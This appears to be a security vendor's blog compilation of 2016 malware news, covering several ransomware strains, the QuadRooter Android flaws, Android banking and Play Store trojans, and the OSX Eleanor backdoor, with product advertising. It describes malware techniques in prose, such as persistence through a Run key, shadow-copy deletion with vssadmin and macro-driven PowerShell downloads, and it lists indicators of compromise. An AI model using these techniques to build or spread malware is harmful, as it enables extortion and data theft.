Alma Locker Ransomware

Alma Locker virus recently appeared and joined the currently roaming ransomware threats. This virus seems to possess new features, it employs Tor command and control servers. Moreover, while other viruses of the same kind mainly disperse through malicious spam email attachments, this sample prefers using the exploit kit.

Alma Locker will generate a random 5 character extension that will be appended to encrypted files and a unique 8 character vicitm ID. This victim ID is derived from the serial number of the C:\ drive and the MAC address of the first network interface. Alma Locker will now search the victim’s drive letters for files with certain extensions and encrypt them using AES-128 encryption. When it encrypts a file it will append the previously generated extension to encrypted files. For example, if the extension associated with a victim is .a5zfn, then a file named test.jpg would be encrypted to a file named test.jpg.a5zfn.

The data files targeted by Alma Locker are: alma1

While encrypting files, Alma Locker will skip files located in folders containing the following strings:

alma2

During the encryption process, Alma Locker will send the following base64 encoded information to the ransomware’s Command & Control server: AES-128 private decryption key, encrypted file extension, user name, name of active network interface, the system Locale ID (LCID), operating system version, victim ID, security software registered with Windows, and the time stamp of when the program was started. When it has finished it will display a ransom note explaining what has happened to the victim’s files:

alma3

The ransom note contains links to the TOR payment site and a link to download a decryptor. When this decryptor is run, it will connect to the Command & Control server and retrieve information such as the current ransom amount, whether a payment has been received, and how many hours left in the five day countdown.
alma4

The ransom notes contain links to a TOR site where it states a victim can perform some test file decryptions to prove that they can decrypt your files.
alma5

Unfortunately, it appears that this free decryption is currently not working.

New DetoxCrypto Ransomware pretends to be PokemonGo

pokemon-background

Above is the screenshot of a message (wallpaper) encouraging users to contact the developers of DetoxCrypto ransomware to decrypt their compromised data

DetoxCrypto is ransomware-type malware that infiltrates the system and encrypts various data types (.psd, .ppt, .docx, .zip, .rar, etc.) Note that unlike other ransomware, DetoxCrypto does not change the filenames or add any type of extension, which is quite unusual. Following successful encryption, DetoxCrypto changes the desktop wallpaper and opens a pop-up window. Both contain a ransom-demand message.

DetoxCrypto informs users of the encryption and states that decryption without a private key is impossible. When using an asymmetric cryptography, two keys (public [encryption] and private [decryption]) are generated during the encryption process. Cyber criminals store the private key on remote servers and users are encouraged to buy it. To contact the cyber criminals victims are asked to write an email to pokemongo@mail2tor.com, contact365@mail2tor.com or motox2016@mail2tor.com addresses. The size of ransom is 3 Bitcoins (currently, 1 Bitcoin is equivalent to ~$574). The size of this ransom is quite large, since most cyber criminals responsible for the development of ransomware demand .5 – 1.5 Bitcoin.

Screenshot of DetoxCrypto ransom-demand pop-up message:

detoxcrypto-popup

The Pokemon themed variant of DetoxCrypto is distributed as an executable called Pokemongo.exe. When executed the ransomware will extract numerous files to the C:\Users\[account_name]\Downloads\Pokemon folder as shown below.
pokemon-folder

So far there is no possibility of being able to repair the encrypted files, neither paying ransom has helped, as in some cases they have taken money and not provided key to decrypt these files. So best option is to use a good total security program such as Max Total Security which provides you with automatic back up feature, just schedule it to back up everyday and be prepared for such challenges. So that you can restore your backed up files or restore your PC to the last known good configuration.

QuadRooter Android Vulnerabilities in Over 900 Million Devices

QuadRooter is a set of four vulnerabilities affecting Android devices built on Qualcomm® chipsets. If any one of the four vulnerabilities is exploited, an attacker can trigger privilege escalations and gain root access to a device. An attacker can exploit these vulnerabilities using a malicious app. These apps require no special permissions to take advantage of these vulnerabilities, alleviating any suspicion users may have when installing.

This affects an estimated 900 million Android devices manufactured by OEMs like Samsung, HTC, Motorola, LG and more. In fact, some of the latest and most popular Android devices found on the market today use the vulnerable Qualcomm chipsets including:

BlackBerry Priv
Blackphone 1 and 2
Google Nexus 5X, 6 and 6P
HTC One M9 and HTC 10
LG G4, G5, and V10
New Moto X by Motorola
OnePlus One, 2 and 3
Samsung Galaxy S7 and S7 Edge
Sony Xperia Z Ultra

Unique vulnerabilities affect four modules. Each vulnerability impacts a device’s entire Android system:
1. IPC Router (inter-process communication)
2. Ashmem (Android kernel anonymous shared memory feature)
3. kgsl (kernel graphics support layer)
4. kgsl_sync (kernel graphics support layer sync)

Please follow these best practices to keep your Android devices safe:
 Download and install the latest Android updates as soon as they become available. These include important security updates that help keep your device and data protected.
 Understand the risks of rooting your device – either intentionally or as a result of an attack.
 Avoid side-loading Android apps (.APK files) or downloading apps from third-party sources. Instead, practice good app hygiene by
downloading apps only from Google Play.
 Carefully read permission requests when installing apps. Be wary of apps that ask for unusual or unnecessary permissions or that use large amounts of data or battery life.
 Use known, trusted Wi-Fi networks. If traveling, use only networks you can verify are provided by a trustworthy source.
 Consider mobile security solutions such as Max Total Security that detect suspicious behavior on a device, including malware hiding in installed apps.

Hitler-Ransomware

hitler

Hitler-Ransomware, a piece of file-encrypting malware that emerged recently, isn’t yet able to encrypt files, but still displays a lock screen and asks for a €25 ($28) ransom.

The Hitler ransomware infection takes place when the user double-clicks on an infected binary. It looks like file deletion is becoming a standard tactic in new ransomware applications created by less skilled ransomware developers. This is shown in a new ransomware called Hitler-Ransomware, or mispelled in the lock screen as Hitler-Ransonware. This ransomware shows a lock screen displaying Hitler and then states that your files were encrypted. It then prompts you enter a cash code for a 25 Euro Vodafone Card as a ransom payment to decrypt your files.

This ransomware appears to be a test variant based on the comments in the embedded batch file and because it does not encrypt any files at all. Instead this malware will remove the extension for all of the files under various directories, display a lock screen, and then show a one hour countdown as shown in the lock screen below. After that hour it will crash the victim’s computer, and on reboot, delete all of the files under the %UserProfile% of the victim. I hope this is not the actual code that this ransomware developer plans on using if it goes live.

The developer also appears to be German based on the text found within an embedded batch file. In the batch file is the following German text :
Das ist ein Test
besser gesagt ein HalloWelt
copyright HalloWelt 2016
:d by CoolNass
Ich bin ein Pro
fuer Tools für Windows

This translates to English as:
This is a test
rather a Hello World
copyright Hello World 2016
: D by Cool Wet
I am a Pro
for Tools for Windows

Files associated with Hitler-Ransomware:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\firefox32.exe
%Temp%\[folder].tmp\
%Temp%\[folder].tmp\chrst.exe
%Temp%\[folder].tmp\ErOne.vbs
%Temp%\[folder].tmp\firefox32.exe

Max Total Security can detect and remove this Malware.

Banking Trojan risks Android devices

The malware is disguised as an update for the browser – a malicious application called last-browser-update.apk. As it turned out, malicious downloads happening through the Google AdSense advertising network, which is used by many (not just news) sites to display targeted advertising to users. Site owners have similar advertisements.

To spread the infection, Trojan uses the features of Google AdSense advertising network, which demonstrates targeted advertising. When you visit a page with the advertisement Trojan download occurs immediately

Malware Svpeng family can steal information about the user’s bank card via phishing windows, as well as to intercept, delete, and send text messages. In addition, the Trojan collects information about calls, the content of text and multimedia messages, browser bookmarks, and contacts.

Max Total Security for Android can detect and remove such Malware.

R980 Ransomware arrives via spam emails

r980
Like Locky, Cerber and MIRCOP, spam emails carrying this ransomware contain documents embedded with a malicious macro (detected as W2KM_CRYPBEE.A) that is programmed to download R980 through a particular URL. From the time R980 was detected, there have been active connections to that URL since July 26th of this year.

R980 encrypts 151 file types using a combination of AES-256 and RSA 4096 algorithms. Although it appends the .crypt extension to the encrypted files, it does not bear any other resemblance to previous versions of CryptXXX which used the same extension name. For the encryption mechanism, R980 uses a Cryptographic Service Provider (CSP), a software library used by developers to implement cryptographic functions to Windows-based applications.

For persistence, it uses the registry key, HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Unlike most ransomware, it does not delete itself after infecting the system. R980 is also somewhat reminiscent of DMA Locker (detected as RANSOM.MADLOCKER.B) as it drops the following components and indicators of compromise (IOC):

rtext.txt – the ransom note
status.z – IOC for initial execution of the ransomware
status2.z – IOC for the execution of the dropped copy
k.z – contains the downloaded base64 decoded data
fnames.txt – contains the filenames of the encrypted files

To protect yourself from such ransomware, you need to back up your data regularly. Max Total Security detects and can protect your PC from such Malware.

Malicious app on Google Play

On Google Play a set of malware published by the developer account ValerySoftware is discovered by McAfee Labs researchers.

    Some characteristics of this malware:

  1. Encrypted and obfuscated at many levels
  2. Downloads APK files from external sources
  3. Tries to install apps from Google Play without user interaction
  4. Displays or silently accesses ads from multiple vendors of advertisement development kits
  5. Leaks sensitive information
  6. Receives commands to open and close applications
  7. Receives commands to install and uninstall applications

This Trojan pretends to be a game patch but is only a WebView function that locally loads a couple of HTML resources after requesting device admin privileges—probably to avoid uninstallation after its disappointing execution. In the background, however, the malware loads and decrypts multiple .dex files to start malicious activities that go unnoticed.

Based in the domain owner’s information in this malware, we can tie the authors to a group of known cyber criminals in Europe who host and distribute malware. To pass unnoticed, the malware authors incorporated anti-emulation techniques in the malicious code so the behavior could not be detected by automated dynamic test environments.

Although Google has been successful in improving the policing of malicious apps, this threat is a reminder that malware can still be present even in official stores. Your first check before installing an app should be reviews by other users. Also check that permissions the app requests are related to its functionality, and review the developer profile to look for other apps.

OSX malware Eleanor

Security researchers have discovered a nasty surprise hidden as a fake file converter application, called EasyDoc Converter, available on a number of download sites, that offers everything but what users expected. The EasyDoc Converter app purports to be a drag-and-drop file converter, but in reality has no beneficial functionality — instead it simply downloads a malicious script.

The new Mac malware OSX/Eleanor, is a serious threat and, if installed, can enable attackers to take full control of the compromised machine. The scourge opens a backdoor on infected Macs and, according to researchers, can steal data, execute remote code and access the webcam, among other things.

Powerware Ransomware scares users with .Locky extensions

This malware is responsible for encrypting files on a victim’s machine and demanding a ransom via the Bitcoin cryptocurrency.
In addition to using the ‘.locky’ filename extension on encrypted files, this PowerWare variant also uses the same ransom note as the Locky malware family. This is not the first time PowerWare has imitated other malware families, as earlier versions have been known to use the CryptoWall ransom note. Other instances of ransomware have also been known to borrow code from others, such as the TeslaCrypt ransomware family.

These attempts to mimic the far more mature and sophisticated Locky ransomware is an attempt by PowerWare authors to trick victims into thinking they are dealing with Locky, versus the immature PowerWare ransomware that can be defeated.

Compared to Locky, PowerWare uses static hard-coded encryption keys for decryption and packs a far weaker psychological punch to victims, because it is new and unknown. “If some is infected with Locky the only way to get your files back is by paying the ransom. But PowerWare is relatively lame compared to Locky.

PowerWare victims become infected with the PowerWare ransomware if they are tricked into enabling macros on malicious Word Documents. Once enabled, the macro opens cmd.exe, which then calls PowerShell to download a malicious script. The macros are there to launch PowerShell and pull down the ransomware script. PowerWare then uses PowerShell to ultimately encrypt files stored on the machine once it’s compromised.

Malware mimic and flatter other popular malware and cash on their success

A new ransomware family called CrypMIC is found to be impersonating CryptXXX ransomware. The new ransomware family mimics CryptXXX not only in terms of entry point, but also when it comes to the ransom note and payment site UI.

However, the source code and capabilities of the two are different. CrypMIC doesn’t append an extension to the encrypted files, and uses a different compiler and obfuscation method. Moreover, unlike CryptXXX, CrypMIC has a routine to check for the presence of a virtual machine on the infected system, while also designed to send that information to its C&C.

The new piece of ransomware uses AES-256 encryption, targets 901 file types on the infected machines, and has no autostart or persistence mechanisms. The malware can run its encryption routine even in a virtualized environment and sends the information to the C&C. Moreover, it leverages vssadmin for shadow copies deletion.

The same as CryptXXX, CrypMIC is particularly dangerous to enterprises because it can also encrypt files on removable and network drives, although it can target only network shares that have been already mapped to a drive. Both ransomware families demand the same ransom amount, namely 1.2 to 2.4 Bitcoins.

However, the newcomer doesn’t download and execute an information-stealing module on its process memory, meaning that it isn’t able to harvest credentials and related information from the infected machine, something that CryptXXX has become famous for. businesses and users who end up paying the ransom are susceptible to more ransomware attacks. The best way to protect against such threats is to keep systems updated, to have the latest security patches installed, use multilayered defenses, and constantly backup data, so that files can be easily restored even in case of an infection.